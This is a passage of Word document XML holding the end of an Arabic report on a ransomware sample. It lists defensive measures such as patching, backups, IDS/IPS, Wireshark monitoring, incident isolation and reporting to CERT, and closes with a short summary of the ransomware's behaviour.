        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">تعزيز الأمان من خلال التحديثات الدورية </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C380055" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• التأكد من تحديث أنظمة التشغيل والتطبيقات باستمرار لسد الثغرات الأمنية. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B718FFA" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• استخدام حلول متقدمة لمكافحة الفيروسات تعتمد على التحليل السلوكي لاكتشاف الأنشطة المشبوهة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAD2E27" w14:textId="4EC8EB43" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">تقليل فرص تشغيل البرمجيات الضارة </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D08130" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• تفعيل سياسات أمنية تمنع تشغيل الملفات غير الموثوقة، مثل إعدادات </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Group Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8BB05" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• تقييد صلاحيات المستخدمين، بحيث لا يتمكنوا من تعديل إعدادات النظام أو تشغيل برامج غير مصرح بها. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B8B94" w14:textId="780869B7" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">تعزيز حماية البيانات </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539681A9" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• تنفيذ عمليات نسخ احتياطي منتظمة، والاحتفاظ بنسخ غير متصلة بالشبكة لضمان استعادة البيانات عند الحاجة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF90284" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• استخدام تقنيات التشفير الوقائي لحماية الملفات المهمة من التعديل غير المصرح به. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE25ECB" w14:textId="252D0FF1" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">تحسين قدرات الكشف عن التهديدات </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B473E" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>• تفعيل أنظمة كشف التسلل (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>IDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>) ومنع التسلل (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>IPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">) لمراقبة سلوك الشبكة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C909E3" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• تحليل حركة البيانات باستخدام </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> لرصد الاتصالات المشبوهة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D26BF" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• رفع مستوى الوعي الأمني لدى الموظفين حول مخاطر </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>التصيد</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> الاحتيالي والهندسة الاجتماعية. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A14730F" w14:textId="41261F4D" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">الاستجابة الفورية للهجمات </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>السيبرانية</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8EE216" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• عزل الأنظمة المصابة فور اكتشاف الإصابة لمنع انتشار البرمجية داخل الشبكة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D844573" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• عدم دفع الفدية، حيث لا يضمن ذلك استعادة البيانات، كما أنه يشجع القراصنة على تنفيذ هجمات أخرى. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66693659" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• إبلاغ الفرق الأمنية المختصة، مثل فرق الاستجابة لحوادث الأمن </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>السيبراني</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>CERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">)، لاتخاذ الإجراءات اللازمة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56F1E9" w14:textId="40F2B64C" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">الخاتمة </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8B61F8" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>يكشف التحليل أن البرمجية المشبوهة هي برمجية فدية (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">)، حيث تعتمد على تشفير بيانات المستخدمين وطلب فدية مالية مقابل فك التشفير. وقد أظهرت الفحوص التقنية أن البرمجية تستغل أساليب متطورة مثل تعديل إعدادات النظام، إنشاء اتصالات بخوادم خارجية، واستخدام خوارزميات تشفير قوية لضمان استمرارها داخل الجهاز المصاب. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3A3757" w14:textId="246FD260" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>وللحد من مخاطر هذا النوع من التهديدات، ينبغي تبني استراتيجية أمنية شاملة تشمل تحديث الأنظمة باستمرار، فرض قيود على تنفيذ البرامج غير الموثوقة، مراقبة نشاط الشبكة، والاستعداد للاستجابة السريعة عند وقوع الهجمات. من خلال هذه التدابير، يمكن تعزيز مستوى الحماية الرقمية وضمان استمرارية الأعمال في مواجهة الهجمات الإلكترونية المتطورة.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789558EF" w14:textId="6D69F30C" w:rsidR="001D0A4C" w:rsidRPr="00BD3CF0" w:rsidRDefault="001D0A4C" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001D0A4C" w:rsidRPr="00BD3CF0" w:rsidSect="001D0A4C">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="144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427E7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D760F55A"/>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508F545C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7A01AEA"/>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18187136">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="136879473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34"/>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0A4C"/>
